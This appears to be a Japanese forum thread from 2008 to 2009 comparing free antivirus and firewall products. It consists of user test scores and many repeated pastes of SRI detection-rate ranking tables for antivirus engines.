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某有名ウェブアプリのサイト改竄の脆弱性を発見した 【AOL】Active Virus Shield【AVS3】 AVG Free Edition vs avast! 4 Home Edition AVGの後継はなんだ!!
1 :08/07/26 〜 最終レス :11/01/09 http://www.download.com/PC-Security-Test-2007/3000-2239_4-10696151.html?tag=lst-0-6&cdlPid=10696152 PC Security Test 2007(FREE) ↑ 私はハッキングに対しては100%が出ましたが、 ウィルスは30%、スパイウェアは0%でした。 貧乏なんでフリーソフトしか入れれません。 フリーだとこの程度でしょうか・・・ avira,zonealarm,hazardshieldを入れた結果がこれです。
2 : 2
3 : avast4.8、comodoで、すべて100%だったぞ
4 : えくせれんと
5 : ESETで100% 30% 0% だった・・・・どうなんだ、これ?
6 : スパイウェアガード入れたら25%になった
7 : スパイウェアバスターは入れても効果なしだった。まじっすか・・
8 : スパイウェアガードはスタートページを変えられてしまうテスト に反応しました。(後のテストはダメでしたが)
9 : 誰かキングソフト試してくれないかなぁ
10 : ウィルスバスター2008 最新版だと 100% 30% 0% なんだ0%ってorz ちなみに、フリーのavast+comodo は、100% 30% 0% 同じくフリーのkingsoft Uは 100% 100% 50% ってことで、フリーのしかもここで悪名高いキングが最も良いって どういうこと?
11 : 禁愚にそこまでの能力があったとは意外です
12 : spybotを導入しても防御効果なしだった、ほんとかよ?
13 : V3+windows defender 100% 55% 0% ですた。windows defenderは、役にたっていないのか?
14 : windows defenderとspybotの盾は弱い。 例えるならジャスコとか西友の警備さん。
15 : 設定に問題あるんじゃねーか?
16 : 常駐しないソフトは点数でないんちゃう?
17 : >>13 55%は立派
18 : 無料のアロバックスシールド(常駐)入れて50%以上出たけど これシールドだけだしなぁ
19 : コモドとAVG8使用 (その他使用ソフト無し、サブ機の為全てフリー) で全部100%出たよ
20 : コモドはFW?
21 : >>1 Avast ttp://www.iso-g.com/modules/newbb/viewtopic.php?topic_id=84&forum=1&post_id=372#forumpost372 お前ら踊らされ杉w
22 : 検知力テスト(2008年10月10日) Most Effective Antivirus Tools Against New Malware Binaries ttp://mtc.sri.com/live_data/av_rankings/ Rank Detects Missed Product 1st 96% 119 AntiVir 2nd 94% 186 Ikarus 3rd 93% 244 BitDefender 4th 92% 259 AVG 5th 91% 306 F-Secure 6th 90% 355 Avast 7th 89% 360 Sophos 8th 89% 378 Norman 9th 88% 408 Webwasher-Gateway 10th 86% 486 ClamAV 11th 85% 508 Kaspersky 12th 85% 515 Microsoft 13th 84% 538 CAT-QuickHeal 14th 84% 559 VirusBuster 15th 84% 564 DrWeb 16th 83% 604 Fortinet 17th 81% 648 Symantec 18th 81% 667 Rising 19th 81% 674 F-Prot 20th 80% 691 eTrust-Vet 21st 76% 818 McAfee 22nd 75% 860 TheHacker 23rd 75% 861 Authentium 24th 75% 887 AhnLab-V3 25th 74% 889 Panda 26th 74% 905 VBA32 27th 65% 1238 NOD2.7w 28th 60% 1412 TrendMicro
23 : 検知力テスト(2008年10月21日) Most Effective Antivirus Tools Against New Malware Binaries ttp://mtc.sri.com/live_data/av_rankings/ Rank Detects Missed Product 1st 96% 119 AntiVir 2nd 94% 192 Ikarus 3rd 93% 243 BitDefender 4th 92% 262 AVG 5th 91% 311 F-Secure 6th 90% 359 Avast 7th 90% 366 Sophos 8th 89% 379 Norman 9th 86% 480 ClamAV 10th 86% 509 Kaspersky 11th 85% 515 Microsoft 12th 85% 545 CAT-QuickHeal 13th 84% 563 DrWeb 14th 84% 572 VirusBuster 15th 84% 582 Webwasher-Gateway 16th 83% 610 Fortinet 17th 82% 641 Symantec 18th 81% 672 Rising 19th 81% 683 F-Prot 20th 80% 703 eTrust-Vet 21st 77% 828 McAfee 22nd 76% 859 Authentium 23rd 75% 884 TheHacker 24th 75% 885 AhnLab-V3 25th 75% 893 Panda 26th 75% 910 VBA32 27th 63% 1348 TrendMicro 28th 61% 1395 NOD32v2
24 : Most Effective Antivirus Tools Against New Malware Binaries ttp://mtc.sri.com/live_data/av_rankings/ Rank Detects Missed Product 1st 96% 121 AntiVir 2nd 94% 209 AVG 3rd 94% 213 Ikarus 4th 93% 248 BitDefender 5th 91% 322 F-Secure 6th 91% 335 Avast 7th 90% 380 Norman 8th 89% 413 Sophos 9th 89% 434 ClamAV 10th 89% 435 Microsoft 11th 88% 457 GData 12th 87% 506 Kaspersky 13th 85% 583 DrWeb 14th 84% 608 CAT-QuickHeal 15th 84% 608 Rising 16th 84% 628 Symantec 17th 83% 645 VirusBuster 18th 83% 656 Fortinet 19th 83% 668 F-Prot 20th 81% 731 eTrust-Vet 21st 81% 752 Authentium 22nd 79% 832 AhnLab-V3 23rd 78% 868 McAfee 24th 78% 868 VBA32 25th 77% 901 TrendMicro 26th 76% 945 TheHacker 27th 76% 949 Panda 28th 64% 1396 Webwasher-Gateway 29th 47% 2102 NOD32v2
25 : Rank Detects Missed Product(2008年11月15日) ttp://mtc.sri.com/live_data/av_rankings/ 1st 97% 121 AntiVir 2nd 94% 208 AVG 3rd 94% 216 Ikarus 4th 93% 248 BitDefender 5th 91% 328 F-Secure 6th 91% 334 Avast 7th 90% 380 Norman 8th 89% 414 Sophos 9th 89% 433 ClamAV 10th 89% 434 Microsoft 11th 88% 454 GData 12th 87% 507 Kaspersky 13th 85% 587 DrWeb 14th 84% 609 Rising 15th 84% 614 CAT-QuickHeal 16th 84% 632 Symantec 17th 83% 646 VirusBuster 18th 83% 659 Fortinet 19th 83% 672 F-Prot 20th 81% 732 eTrust-Vet 21st 81% 756 Authentium 22nd 79% 835 AhnLab-V3 23rd 78% 871 McAfee 24th 78% 874 VBA32 25th 77% 898 TrendMicro 26th 76% 953 TheHacker 27th 76% 953 Panda 28th 64% 1433 Webwasher-Gateway 29th 46% 2138 NOD32v2 30th 44% 2239 Ewido 31st 26% 2962 Prevx1
26 : Rank Detects Missed Product(2008年11月16日) ttp://mtc.sri.com/live_data/av_rankings/ 1st 97% 121 AntiVir ★(*´○`)ノ゙[4031 malware] 2nd 94% 207 AVG 3rd 94% 215 Ikarus 4th 93% 248 BitDefender 5th 91% 330 F-Secure 6th 91% 333 Avast 7th 90% 381 Norman 8th 89% 415 Sophos 9th 89% 433 Microsoft 10th 89% 434 ClamAV 11th 88% 452 GData 12th 87% 507 Kaspersky 13th 85% 587 DrWeb 14th 84% 609 Rising 15th 84% 614 CAT-QuickHeal 16th 84% 632 Symantec 17th 83% 646 VirusBuster 18th 83% 658 Fortinet 19th 83% 672 F-Prot 20th 81% 732 eTrust-Vet 21st 81% 754 Authentium 22nd 79% 830 AhnLab-V3 23rd 78% 871 McAfee 24th 78% 874 VBA32 25th 77% 889 TrendMicro 26th 76% 952 Panda 27th 76% 955 TheHacker 28th 63% 1458 Webwasher-Gateway 29th 46% 2163 NOD32v2 30th 44% 2233 Ewido 31st 26% 2978 Prevx1
27 : Rank Detects Missed Product(2008年11月17日) ttp://mtc.sri.com/live_data/av_rankings/ 1st 96% 123 AntiVir ★(*´○`)ノ゙[4060 malware] 2nd 94% 208 AVG 3rd 94% 219 Ikarus 4th 93% 250 BitDefender 5th 91% 331 F-Secure 6th 91% 333 Avast 7th 90% 381 Norman 8th 89% 416 Sophos 9th 89% 433 ClamAV 10th 89% 435 Microsoft 11th 88% 450 GData 12th 87% 508 Kaspersky 13th 85% 589 DrWeb 14th 85% 610 Rising 15th 84% 620 CAT-QuickHeal 16th 84% 633 Symantec 17th 84% 645 VirusBuster 18th 83% 662 Fortinet 19th 83% 677 F-Prot 20th 81% 733 eTrust-Vet 21st 81% 758 Authentium 22nd 79% 830 AhnLab-V3 23rd 78% 874 McAfee 24th 78% 878 VBA32 25th 78% 880 TrendMicro 26th 76% 956 TheHacker 27th 76% 961 Panda 28th 63% 1496 Webwasher-Gateway 29th 45% 2197 NOD32v2 30th 44% 2248 Ewido 31st 25% 3006 Prevx1
28 : Rank Detects Missed Product(2008年11月21日) ttp://mtc.sri.com/live_data/av_rankings/ 1st 96% 128 AntiVir 2nd 94% 208 AVG 3rd 94% 226 Ikarus 4th 93% 254 BitDefender 5th 91% 335 F-Secure 6th 91% 337 Avast 7th 90% 383 Norman 8th 89% 422 Sophos 9th 89% 432 Microsoft 10th 89% 436 GData 11th 89% 438 ClamAV 12th 87% 508 Kaspersky 13th 85% 594 DrWeb 14th 85% 601 Rising 15th 84% 626 CAT-QuickHeal 16th 84% 633 Symantec 17th 84% 647 VirusBuster 18th 83% 661 Fortinet 19th 83% 670 F-Prot 20th 81% 739 eTrust-Vet 21st 81% 748 Authentium 22nd 79% 812 TrendMicro 23rd 79% 814 AhnLab-V3 24th 78% 867 VBA32 25th 78% 874 McAfee 26th 76% 953 Panda 27th 76% 965 TheHacker 28th 61% 1550 Webwasher-Gateway 29th 45% 2208 Ewido 30th 44% 2240 NOD32v2 31st 26% 2993 Prevx1 (*´○`)ノ゙[4044 malware]
29 : Rank Detects Missed Product(2008年11月24日) ttp://mtc.sri.com/live_data/av_rankings/ 1st 96% 145 AntiVir 2nd 94% 225 AVG 3rd 94% 243 Ikarus 4th 93% 271 BitDefender 5th 91% 352 F-Secure 6th 91% 354 Avast 7th 90% 400 Norman 8th 89% 428 Sophos 9th 88% 448 Microsoft 10th 88% 453 GData 11th 88% 455 ClamAV 12th 87% 525 Kaspersky 13th 84% 611 DrWeb 14th 84% 618 Rising 15th 84% 643 CAT-QuickHeal 16th 84% 650 Symantec 17th 83% 664 VirusBuster 18th 83% 676 F-Prot 19th 83% 678 Fortinet 20th 81% 754 Authentium 21st 81% 756 eTrust-Vet 22nd 80% 812 TrendMicro 23rd 79% 831 AhnLab-V3 24th 78% 884 VBA32 25th 78% 891 McAfee 26th 76% 970 Panda 27th 75% 982 TheHacker 28th 61% 1567 Webwasher-Gateway 29th 45% 2225 Ewido 30th 44% 2257 NOD30w (*´○`)ノ゙[4061 malware]
30 : Rank Detects Missed Product(2008年11月25日) ttp://mtc.sri.com/live_data/av_rankings/ 1st 96% 150 AntiVir 2nd 94% 230 AVG 3rd 93% 248 Ikarus 4th 93% 276 BitDefender 5th 91% 357 F-Secure 6th 91% 359 Avast 7th 90% 405 Norman 8th 89% 431 Sophos 9th 88% 450 Microsoft 10th 88% 458 GData 11th 88% 460 ClamAV 12th 86% 530 Kaspersky 13th 84% 616 DrWeb 14th 84% 623 Rising 15th 84% 648 CAT-QuickHeal 16th 83% 655 Symantec 17th 83% 669 VirusBuster 18th 83% 679 F-Prot 19th 83% 683 Fortinet 20th 81% 757 Authentium 21st 81% 761 eTrust-Vet 22nd 80% 812 TrendMicro 23rd 79% 836 AhnLab-V3 24th 78% 889 VBA32 25th 77% 896 McAfee 26th 76% 975 Panda 27th 75% 987 TheHacker 28th 61% 1573 Webwasher-Gateway 29th 45% 2231 Ewido 30th 44% 2263 NOD32v2 31st 25% 3016 Prevx1 (*´○`)ノ゙[4067 malware]
31 : Rank Detects Missed Product(2008年12月01日) ttp://mtc.sri.com/live_data/av_rankings/ 1st 95% 171 AntiVir ★(*´○`)ノ゙[4052 malware] 2nd 93% 249 AVG 3rd 93% 266 Ikarus 4th 92% 293 BitDefender 5th 90% 374 Avast 6th 90% 382 F-Secure 7th 89% 424 Norman 8th 89% 432 Sophos 9th 88% 452 Microsoft 10th 88% 473 ClamAV 11th 88% 474 GData 12th 86% 549 Kaspersky 13th 84% 630 DrWeb 14th 84% 633 Rising 15th 84% 647 Symantec 16th 83% 656 CAT-QuickHeal 17th 83% 674 F-Prot 18th 83% 683 VirusBuster 19th 82% 696 Fortinet 20th 81% 750 Authentium 21st 81% 767 TrendMicro 22nd 80% 774 eTrust-Vet 23rd 79% 839 AhnLab-V3 24th 77% 897 McAfee 25th 77% 899 VBA32 26th 75% 979 Panda 27th 75% 990 TheHacker 28th 60% 1597 Webwasher-Gateway 29th 45% 2228 Ewido 30th 43% 2275 NOD32v2 31st 25% 3005 Prevx1
32 : Rank Detects Missed Product(2008年12月09日) ttp://mtc.sri.com/live_data/av_rankings/ 1st 95% 189 AntiVir ★(*´○`)ノ゙[4008 malware] 2nd 93% 260 AVG 3rd 93% 280 Ikarus 4th 92% 309 BitDefender 5th 90% 386 Avast 6th 90% 399 F-Secure 7th 89% 429 Sophos 8th 89% 429 Norman 9th 88% 452 Microsoft 10th 88% 476 GData 11th 87% 484 ClamAV 12th 85% 564 Kaspersky 13th 84% 633 DrWeb 14th 84% 637 Rising 15th 83% 648 Symantec 16th 83% 660 F-Prot 17th 83% 669 CAT-QuickHeal 18th 82% 692 VirusBuster 19th 82% 693 TrendMicro 20th 82% 697 Fortinet 21st 81% 730 Authentium 22nd 80% 783 eTrust-Vet 23rd 79% 822 AhnLab-V3 24th 77% 894 VBA32 25th 77% 895 McAfee 26th 75% 967 Panda 27th 75% 997 TheHacker 28th 59% 1625 Webwasher-Gateway 29th 45% 2195 Ewido 30th 43% 2279 NOD32v2 31st 25% 2973 Prevx1
33 : 検知力テスト(2008年12月16日) Most Effective Antivirus Tools Against New Malware Binaries ttp://mtc.sri.com/live_data/av_rankings/ (*´○`)ノ゙[3975 malware] Rank Detects Missed Product 1st 94% 200 AntiVir 2nd 93% 273 AVG 3rd 92% 289 Ikarus 4th 91% 321 BitDefender 5th 90% 392 Avast 6th 89% 404 F-Secure 7th 89% 417 Sophos 8th 89% 437 Norman 9th 88% 451 Microsoft 10th 87% 482 GData 11th 87% 495 ClamAV 12th 85% 569 Kaspersky 13th 84% 633 DrWeb 14th 84% 633 Rising 15th 83% 647 Symantec 16th 83% 653 F-Prot 17th 83% 657 TrendMicro 18th 83% 676 CAT-QuickHeal 19th 82% 696 Fortinet 20th 82% 702 VirusBuster 21st 81% 721 Authentium 22nd 80% 781 eTrust-Vet 23rd 79% 812 AhnLab-V3 24th 77% 890 McAfee 25th 77% 899 VBA32 26th 75% 962 Panda │ 30th 42% 2277 NOD32v2
34 : 検知力テスト(2008年12月23日) Most Effective Antivirus Tools Against New Malware Binaries ttp://mtc.sri.com/live_data/av_rankings/ (*´○`)ノ゙[3956 malware] Rank Detects Missed Product 1st 94% 213 AntiVir 2nd 92% 283 AVG 3rd 92% 298 Ikarus 4th 91% 331 BitDefender 5th 89% 406 Avast 6th 89% 412 F-Secure 7th 89% 414 Sophos 8th 88% 447 Norman 9th 88% 459 Microsoft 10th 87% 487 GData 11th 87% 510 ClamAV 12th 85% 579 Kaspersky 13th 83% 642 TrendMicro 14th 83% 642 Rising 15th 83% 643 DrWeb 16th 83% 655 F-Prot 17th 83% 658 Symantec 18th 82% 689 CAT-QuickHeal 19th 82% 701 Fortinet 20th 81% 714 VirusBuster 21st 81% 719 Authentium 22nd 79% 793 eTrust-Vet 23rd 79% 819 AhnLab-V3 24th 77% 895 McAfee 25th 77% 905 VBA32 26th 75% 964 Panda │ 30th 42% 2289 NOD32v2
35 : Rank Detects Missed Product(2009年01月02日) ttp://mtc.sri.com/live_data/av_rankings/ 1st 93% 216 AntiVir 2nd 92% 265 AVG 3rd 92% 265 Ikarus 4th 91% 281 BitDefender 5th 90% 339 Microsoft 6th 90% 347 Sophos 7th 89% 383 Avast 8th 88% 387 Norman 9th 88% 400 F-Secure 10th 87% 439 ClamAV 11th 86% 458 GData 12th 85% 489 Kaspersky 13th 84% 535 F-Prot 14th 83% 561 TrendMicro 15th 83% 565 Symantec 16th 83% 573 DrWeb 17th 82% 596 Authentium 18th 82% 604 Rising 19th 82% 606 CAT-QuickHeal 20th 81% 643 VirusBuster 21st 81% 645 Fortinet 22nd 80% 679 AhnLab-V3 23rd 80% 691 eTrust-Vet 24th 78% 754 McAfee 25th 77% 780 VBA32 26th 76% 816 Panda 27th 74% 898 TheHacker 28th 51% 1684 Webwasher-Gateway 29th 50% 1723 Ewido 30th 38% 2152 NOD32v2 31st 23% 2677 Prevx1
36 : Rank Detects Missed Product(2009年01月03日) ttp://mtc.sri.com/live_data/av_rankings/ 1st 93% 216 AntiVir 2nd 92% 262 AVG 3rd 92% 266 Ikarus 4th 91% 279 BitDefender 5th 90% 336 Microsoft 6th 90% 343 Sophos 7th 88% 384 Norman 8th 88% 384 Avast 9th 88% 398 F-Secure 10th 87% 439 ClamAV 11th 86% 456 GData 12th 85% 488 Kaspersky 13th 84% 533 F-Prot 14th 84% 554 TrendMicro 15th 83% 565 Symantec 16th 83% 570 DrWeb 17th 82% 594 Authentium 18th 82% 601 Rising 19th 82% 602 CAT-QuickHeal 20th 81% 640 Fortinet 21st 81% 641 VirusBuster 22nd 80% 675 AhnLab-V3 23rd 80% 687 eTrust-Vet 24th 78% 752 McAfee 25th 77% 777 VBA32 26th 76% 814 Panda 27th 74% 893 TheHacker 28th 51% 1684 Webwasher-Gateway 29th 50% 1714 Ewido 30th 37% 2146 NOD32v2 31st 22% 2665 Prevx1 (*´○`)ノ゙[3459 malware]
37 : 1st 93% 215 AntiVir Most Effective Antivirus Tools Against New Malware Binaries 2nd 92% 260 AVG ttp://mtc.sri.com/live_data/av_rankings/ 3rd 92% 262 Ikarus 4th 91% 278 BitDefender 5th 90% 333 Sophos 6th 90% 333 Microsoft 7th 88% 376 Norman 8th 88% 380 Avast 9th 88% 393 F-Secure 10th 87% 434 ClamAV 11th 86% 452 GData 12th 85% 484 Kaspersky 13th 84% 529 F-Prot 14th 84% 531 TrendMicro 15th 83% 559 Symantec 16th 83% 564 DrWeb 17th 82% 589 Authentium 18th 82% 596 CAT-QuickHeal 19th 82% 596 Rising 20th 81% 628 Fortinet 21st 81% 633 VirusBuster 22nd 80% 664 AhnLab-V3 23rd 80% 675 eTrust-Vet 24th 78% 743 McAfee 25th 77% 767 VBA32 26th 76% 801 Panda 27th 74% 874 TheHacker 28th 50% 1665 Ewido 29th 50% 1692 Webwasher-Gateway 30th 36% 2142 NOD32v2 31st 22% 2613 Prevx1 (*´○`)ノ゙[3384 malware]
38 : 1st 93% 215 AntiVir Most Effective Antivirus Tools Against New Malware Binaries 2nd 92% 252 Ikarus ttp://mtc.sri.com/live_data/av_rankings/ 3rd 92% 254 AVG 4th 91% 272 BitDefender 5th 90% 319 Sophos 6th 89% 322 Microsoft 7th 88% 369 Norman 8th 88% 376 Avast 9th 88% 381 F-Secure 10th 86% 424 ClamAV 11th 86% 431 GData 12th 85% 468 Kaspersky 13th 85% 477 TrendMicro 14th 83% 514 F-Prot 15th 82% 554 Symantec 16th 82% 557 DrWeb 17th 82% 569 Authentium 18th 81% 581 Rising 19th 81% 586 CAT-QuickHeal 20th 80% 616 Fortinet 21st 80% 624 VirusBuster 22nd 79% 652 AhnLab-V3 23rd 79% 660 eTrust-Vet 24th 77% 727 McAfee 25th 76% 739 VBA32 26th 75% 783 Panda 27th 73% 844 TheHacker 28th 51% 1552 Ewido 29th 46% 1697 Webwasher-Gateway 30th 33% 2114 NOD32v2 31st 21% 2500 Prevx1 (*´○`)ノ゙[3196 malware]
39 : 1st 93% 213 AntiVir ★ Most Effective Antivirus Tools Against New Malware Binaries 2nd 92% 250 AVG ttp://mtc.sri.com/live_data/av_rankings/ 3rd 92% 250 Ikarus 4th 91% 270 BitDefender 5th 89% 316 Sophos 6th 89% 317 Microsoft 7th 88% 365 Norman 8th 88% 371 Avast 9th 88% 374 F-Secure 10th 86% 416 ClamAV 11th 86% 427 GData 12th 85% 462 Kaspersky 13th 85% 463 TrendMicro 14th 83% 505 F-Prot 15th 82% 547 Symantec 16th 82% 553 DrWeb 17th 82% 560 Authentium 18th 81% 572 Rising 19th 81% 582 CAT-QuickHeal 20th 80% 608 Fortinet 21st 80% 615 VirusBuster 22nd 79% 649 AhnLab-V3 23rd 79% 650 eTrust-Vet 24th 77% 719 McAfee 25th 76% 731 VBA32 26th 75% 773 Panda 27th 73% 830 TheHacker 28th 51% 1510 Ewido 29th 45% 1696 Webwasher-Gateway 30th 32% 2100 NOD32v2 31st 21% 2461 Prevx1 (*´○`)ノ゙[3129 malware]
40 : 1st 93% 211 AntiVir Most Effective Antivirus Tools Against New Malware Binaries 2nd 92% 244 AVG ttp://mtc.sri.com/live_data/av_rankings/ 3rd 91% 248 Ikarus 4th 91% 265 BitDefender 5th 90% 303 Microsoft 6th 89% 309 Sophos 7th 88% 354 Norman 8th 88% 361 Avast 9th 88% 367 F-Secure 10th 86% 406 ClamAV 11th 86% 417 GData 12th 85% 443 TrendMicro 13th 85% 449 Kaspersky 14th 84% 488 F-Prot 15th 82% 523 Symantec 16th 82% 534 DrWeb 17th 82% 541 Authentium 18th 81% 558 Rising 19th 81% 564 CAT-QuickHeal 20th 80% 593 Fortinet 21st 80% 601 VirusBuster 22nd 79% 624 eTrust-Vet 23rd 79% 626 AhnLab-V3 24th 77% 697 McAfee 25th 76% 712 VBA32 26th 75% 751 Panda 27th 73% 817 TheHacker 28th 52% 1458 Ewido 29th 44% 1695 Webwasher-Gateway 30th 32% 2073 NOD32v2 31st 21% 2407 Prevx1 (*´○`)ノ゙[3059 malware]
41 : 1st 92% 207 AntiVir Most Effective Antivirus Tools Against New Malware Binaries 2nd 91% 234 Ikarus ttp://mtc.sri.com/live_data/av_rankings/ 3rd 91% 235 AVG 4th 91% 252 BitDefender 5th 90% 269 Sophos 6th 90% 270 Microsoft 7th 88% 332 Norman 8th 87% 346 Avast 9th 87% 348 F-Secure 10th 86% 383 ClamAV 11th 86% 392 Kaspersky 12th 86% 403 GData 13th 85% 406 TrendMicro 14th 84% 434 F-Prot 15th 83% 473 Symantec 16th 83% 476 DrWeb 17th 83% 483 Authentium 18th 82% 517 CAT-QuickHeal 19th 81% 519 Rising 20th 80% 553 Fortinet 21st 80% 553 eTrust-Vet 22nd 80% 556 AhnLab-V3 23rd 80% 575 VirusBuster 24th 78% 623 McAfee 25th 77% 636 VBA32 26th 76% 678 Panda 27th 73% 759 TheHacker 28th 54% 1313 Ewido 29th 40% 1697 Webwasher-Gateway 30th 30% 1995 NOD32v2 31st 20% 2270 Prevx1 (*´○`)ノ゙[2872 malware]
42 : 1st 92% 205 AntiVir Most Effective Antivirus Tools Against New Malware Binaries 2nd 91% 230 Ikarus ttp://mtc.sri.com/live_data/av_rankings/ 3rd 91% 234 AVG 4th 91% 249 BitDefender 5th 90% 257 Sophos 6th 90% 269 Microsoft 7th 88% 323 Norman 8th 87% 340 F-Secure 9th 87% 343 Avast 10th 86% 377 ClamAV 11th 86% 379 Kaspersky 12th 86% 393 TrendMicro 13th 85% 397 GData 14th 84% 425 F-Prot 15th 83% 461 Symantec 16th 83% 465 DrWeb 17th 83% 472 Authentium 18th 82% 506 CAT-QuickHeal 19th 81% 509 Rising 20th 80% 537 eTrust-Vet 21st 80% 543 Fortinet 22nd 80% 543 AhnLab-V3 23rd 79% 564 VirusBuster 24th 78% 600 McAfee 25th 77% 621 VBA32 26th 76% 659 Panda │ 30th 29% 1974 NOD32v2 (*´○`)ノ゙[2813 malware]
43 : 1st 92% 202 AntiVir Most Effective Antivirus Tools Against New Malware Binaries 2nd 91% 223 Ikarus ttp://mtc.sri.com/live_data/av_rankings/ 3rd 91% 226 AVG 4th 91% 232 Sophos 5th 90% 238 BitDefender 6th 90% 250 Microsoft 7th 88% 288 Norman 8th 87% 320 Kaspersky 9th 87% 331 F-Secure 10th 87% 336 Avast 11th 86% 344 ClamAV 12th 85% 368 F-Prot 13th 85% 371 TrendMicro 14th 85% 391 GData 15th 84% 410 Symantec 16th 84% 412 DrWeb 17th 84% 414 Authentium 18th 83% 443 CAT-QuickHeal 19th 82% 462 AhnLab-V3 20th 82% 465 eTrust-Vet 21st 81% 475 Rising 22nd 80% 503 Fortinet 23rd 79% 525 McAfee 24th 79% 530 VirusBuster 25th 79% 534 VBA32 26th 77% 580 Panda │ 30th 27% 1891 NOD32v2 (*´○`)ノ゙[2609 malware]
44 : 1st 92% 195 AntiVir Most Effective Antivirus Tools Against New Malware Binaries 2nd 91% 204 Sophos ttp://mtc.sri.com/live_data/av_rankings/ 3rd 91% 215 AVG 4th 91% 219 Ikarus 5th 90% 226 Microsoft 6th 90% 230 BitDefender 7th 89% 264 Norman 8th 88% 290 Kaspersky 9th 87% 318 F-Secure 10th 87% 319 Avast 11th 86% 324 ClamAV 12th 86% 329 F-Prot 13th 86% 338 TrendMicro 14th 84% 370 Authentium 15th 84% 375 Symantec 16th 84% 376 GData 17th 84% 382 DrWeb 18th 83% 405 CAT-QuickHeal 19th 83% 409 AhnLab-V3 20th 82% 421 eTrust-Vet 21st 81% 453 Rising 22nd 80% 477 Fortinet 23rd 80% 477 VBA32 24th 80% 479 McAfee 25th 79% 503 VirusBuster 26th 78% 528 Panda │ 30th 24% 1847 NOD32v2 (*´○`)ノ゙[2457 malware]
45 : 1st 91% 194 AntiVir Most Effective Antivirus Tools Against New Malware Binaries 2nd 91% 199 Sophos ttp://mtc.sri.com/live_data/av_rankings/ 3rd 91% 212 AVG 4th 91% 216 Ikarus 5th 90% 219 Microsoft 6th 90% 227 BitDefender 7th 89% 263 Norman 8th 88% 284 Kaspersky 9th 87% 310 F-Secure 10th 86% 313 Avast 11th 86% 322 F-Prot 12th 86% 322 TrendMicro 13th 85% 359 Authentium 14th 84% 362 GData 15th 84% 365 Symantec 16th 84% 373 DrWeb 17th 83% 399 AhnLab-V3 18th 83% 403 CAT-QuickHeal 19th 82% 415 eTrust-Vet 20th 81% 440 Rising 21st 80% 465 VBA32 22nd 80% 468 Fortinet 23rd 80% 470 McAfee 24th 79% 493 VirusBuster 25th 78% 519 Panda 26th 73% 634 TheHacker 27th 59% 976 Ewido 28th 28% 1703 Webwasher-Gateway 29th 23% 1838 NOD32v2 30th 18% 1946 Prevx1 (*´○`)ノ゙[2391 malware]
46 : 1st 91% 194 AntiVir Most Effective Antivirus Tools Against New Malware Binaries 2nd 91% 199 Sophos ttp://mtc.sri.com/live_data/av_rankings/ 3rd 91% 212 AVG 4th 90% 216 Ikarus 5th 90% 218 Microsoft 6th 90% 228 BitDefender 7th 88% 263 Norman 8th 88% 282 Kaspersky 9th 87% 307 F-Secure 10th 86% 312 Avast 11th 86% 315 TrendMicro 12th 86% 318 F-Prot 13th 86% 321 ClamAV 14th 85% 353 Authentium 15th 84% 357 GData 16th 84% 364 Symantec 17th 84% 371 DrWeb 18th 83% 398 AhnLab-V3 19th 83% 403 CAT-QuickHeal 20th 82% 411 eTrust-Vet 21st 81% 436 Rising 22nd 80% 461 VBA32 23rd 80% 465 Fortinet 24th 80% 468 McAfee 25th 79% 490 VirusBuster 26th 78% 513 Panda 27th 73% 632 TheHacker 28th 59% 969 Ewido 29th 28% 1705 Webwasher-Gateway 30th 22% 1832 NOD32v2 31st 18% 1932 Prevx1 (*´○`)ノ゙[2369 malware]
47 : このテスト結果って公式なものじゃなく操作されてるんだってな 今まで信じてただけにガッカリした
48 : 1st 91% 185 Sophos Most Effective Antivirus Tools Against New Malware Binaries 2nd 91% 186 AntiVir ttp://mtc.sri.com/live_data/av_rankings/ 3rd 90% 203 Microsoft 4th 90% 204 AVG 5th 90% 206 Ikarus 6th 90% 219 BitDefender 7th 88% 253 Norman 8th 88% 266 Kaspersky 9th 87% 272 TrendMicro 10th 87% 281 F-Secure 11th 87% 285 Avast 12th 86% 290 F-Prot 13th 86% 306 ClamAV 14th 85% 320 Authentium 15th 85% 323 GData 16th 84% 339 Symantec 17th 84% 348 DrWeb 18th 82% 380 AhnLab-V3 19th 82% 382 eTrust-Vet 20th 82% 394 CAT-QuickHeal 21st 81% 405 Rising 22nd 81% 423 VBA32 23rd 80% 441 Fortinet 24th 80% 445 McAfee 25th 79% 461 VirusBuster 26th 78% 484 Panda 27th 72% 612 TheHacker 28th 59% 907 Ewido 29th 23% 1702 Webwasher-Gateway 30th 19% 1801 NOD32v2 31st 17% 1838 Prevx1 (*´○`)ノ゙[2223 malware]
49 : Rank Detects Missed Product(2009年3月16日) 1st 91% 180 Sophos Most Effective Antivirus Tools Against New Malware Binaries 2nd 91% 180 AntiVir ttp://mtc.sri.com/live_data/av_rankings/ 3rd 90% 194 Microsoft 4th 90% 196 AVG 5th 90% 203 Ikarus 6th 89% 215 BitDefender 7th 88% 242 Norman 8th 88% 251 TrendMicro 9th 87% 260 Kaspersky 10th 87% 273 F-Secure 11th 86% 277 F-Prot 12th 86% 279 Avast 13th 85% 299 ClamAV 14th 85% 304 Authentium 15th 85% 311 GData 16th 84% 328 Symantec 17th 83% 343 DrWeb 18th 82% 370 eTrust-Vet 19th 82% 372 AhnLab-V3 20th 82% 383 CAT-QuickHeal 21st 81% 391 Rising 22nd 81% 402 VBA32 23rd 79% 430 Fortinet 24th 79% 433 McAfee 25th 79% 446 VirusBuster 26th 78% 467 Panda 27th 72% 586 TheHacker 28th 58% 873 Ewido 29th 19% 1700 Webwasher-Gateway 30th 16% 1777 Prevx1 31st 15% 1789 NOD32v2 (*´○`)ノ゙[2123 malware]
50 : 1st 91% 176 Sophos Most Effective Antivirus Tools Against New Malware Binaries 2nd 91% 178 AntiVir ttp://mtc.sri.com/live_data/av_rankings/ 3rd 90% 193 Microsoft 4th 90% 195 AVG 5th 90% 201 Ikarus 6th 89% 212 BitDefender 7th 88% 240 Norman 8th 88% 244 TrendMicro 9th 87% 259 Kaspersky 10th 86% 267 F-Secure 11th 86% 275 F-Prot 12th 86% 275 Avast 13th 85% 298 ClamAV 14th 85% 302 Authentium 15th 84% 305 GData 16th 84% 324 Symantec 17th 83% 342 DrWeb 18th 82% 365 eTrust-Vet 19th 81% 369 AhnLab-V3 20th 81% 378 CAT-QuickHeal 21st 80% 386 Rising 22nd 80% 400 VBA32 23rd 79% 424 Fortinet 24th 78% 432 McAfee 25th 78% 446 VirusBuster 26th 77% 466 Panda 27th 72% 564 TheHacker 28th 58% 843 Ewido 29th 15% 1704 Webwasher-Gateway 30th 15% 1715 Prevx1 31st 12% 1777 NOD32v2 (*´○`)ノ゙[2026 malware]
